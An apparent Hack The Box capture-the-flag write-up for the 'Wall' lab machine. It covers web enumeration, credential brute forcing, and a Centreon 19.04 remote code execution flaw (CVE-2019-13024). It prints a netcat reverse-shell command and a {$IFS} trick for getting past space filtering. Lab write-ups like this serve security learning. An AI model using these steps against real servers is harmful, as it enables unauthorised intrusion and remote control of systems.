Wall HTB Writeup
Wall 🧱
From port scanning two ports are only available 22,80.
All I see in this port is the default page of apache2. So I fire up gobuster at this time.
gobuster dir -w /usr/share/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.157/ -o port80, which gives me back:
1 | |
visiting /monitoring gives me a basic auth form, but I don’t know any logins,atm. So I run another gobuster but this time with .php extension.
gobuster dir -w /usr/share/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.157/ -o port80withphp -x .php gives me back:
1 | |
- aa.php === 1
- panel.php === just a test for php file !
But again nothing of interest. I tried to brute force the /monitoring directory by using hydra even tho I didn’t knew a single username, but again i failed to find something.
I open the request to /monitoring using burp and change the request from GET /monitoring/ to POST /monitoring/ I get a redirect which sends me to /monitoring/'/centreon'.
We have a new directory: /centreon/
I search and find that I can use their api to send authentication requests, and at this time I create a script to do that for me:
1 | |
The password is password1(Don’t ever use this as password PLEASE 😂).
I login using that password on the interface. Looking at the version I found out version 19.04 has a rce.
I follow this post https://shells.systems/centreon-v19-04-remote-code-execution-cve-2019-13024/.
Basically what you have to do to gain rce is to visit http://10.10.10.157/centreon/main.php?p=60901&o=c&server_id=1 and at the Monitoring Engine Binary put a command, like you do on a terminal and then visit 10.10.10.157/centreon/include/configuration/configGenerate/xml/generateFiles.php to get rce.
But putting nc -e /bin/bash {IP}, does not work. After trying I got it working by putting {$IFS} instead of a space.
The Internal Field Separator (IFS) that is used for word splitting after expansion and to split lines into words with the read builtin command.
Root
there is a screen vulnerability!